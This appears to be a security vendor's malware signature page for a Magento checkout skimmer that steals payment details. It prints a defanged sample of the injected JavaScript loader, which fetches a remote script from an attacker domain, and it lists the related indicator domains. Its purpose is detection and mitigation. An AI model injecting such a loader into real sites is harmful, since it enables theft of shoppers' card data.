SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware.magento_shoplift.38.2

malware.magento_shoplift.38.2

Description: Injection of malicious scripts into Magneto checkout pages. The scripts steal entered payment details and send them to remote third-party sites.

The scripts are typically injected into the core_config_data table

Sample:

<scri pt type="text/javascript">var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;
po.src = 'controlmage[.]com/e/tracking.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);</script>

Domain involed: apissystem[.]com, codesmagento[.]com, controlmage[.]com, cdnppay[.]com, resselerratings[.]com, cdngoogle[.]com, apismanagers[.]com, verpayments[.]com, myageverify[.]com, assetsbraln[.]com, verpayment[.]com, magesources[.]com,traskedlink[.]com, magejavascripts[.]com, mjs24[.]com, m24js[.]com, cdnassels[.]com, magescripts[.]pw and jscriptscloud[.]com

For additional details check the Ecommerce security category of our blog.

Affecting: Magento

Mitigation How to clean a hacked Magento site